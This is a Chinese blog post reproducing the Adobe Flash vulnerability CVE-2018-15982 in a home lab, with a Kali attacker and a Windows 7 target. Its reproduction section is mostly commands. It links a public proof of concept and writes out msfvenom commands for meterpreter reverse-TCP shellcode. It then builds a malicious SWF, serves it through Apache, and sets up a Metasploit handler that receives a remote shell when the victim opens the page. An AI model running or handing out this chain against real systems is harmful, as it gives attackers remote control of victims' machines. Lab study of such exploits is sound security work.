WEB实战系列万网极研社

CVE-2018-15982漏洞复现

2019-02-10  本文已影响70人  泽英君

开篇闲聊:

自从上次写完CVE-2018-4878后我就在想,有没有能简单粗暴干掉我的Win10主机的办法,找了半天,果然没找到(说不出是开心还是悲伤),但是找到了这个最接近最新版本的Flash的漏洞。

漏洞概述:

受影响的版本:

Adobe Flash Player <= 31.0.0.153

Adobe Flash Player Installer<= 31.0.0.108

不受影响的版本:

Adobe Flash Player 32.0.0.101

Adobe Flash Player Installer 31.0.0.122

作者的版本刚好是最底下的那个.....

不过我仔细看了它的起源经过:

2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。

看起来是个很时髦的漏洞,来开始吧!

复现环境:

Kail linux

Win7 + Flash 28(为啥不选最新版本呢?因为这个是做完4878剩下的环境,懒得再下新版了哈哈)

POC: https://github.com/B1eed/VulRec/tree/master/CVE-2018-15982

复现过程:

1、创建payload程序

root@wuyou:~/CVE-2018-15982# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 64.bin

root@wuyou:~/CVE-2018-15982# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 86.bin

2、生成文件视频文件和网页

root@wuyou:~/CVE-2018-15982# python CVE-2018-15982.py -i 86.bin -I 64.bin -o exploit.swf

3、开启Apache服务

root@wuyou:~/CVE-2018-4878# service apache2 start

root@wuyou:~/CVE-2018-4878# cp index.html /var/www/html/index.html

root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf

4、开始监听

root@wuyou:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.190.134

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

5、在靶机打开网页

192.168.190.134/index.html

页面内容

这是渗透机已经成功获取到Session了!

上一篇下一篇

猜你喜欢

热点阅读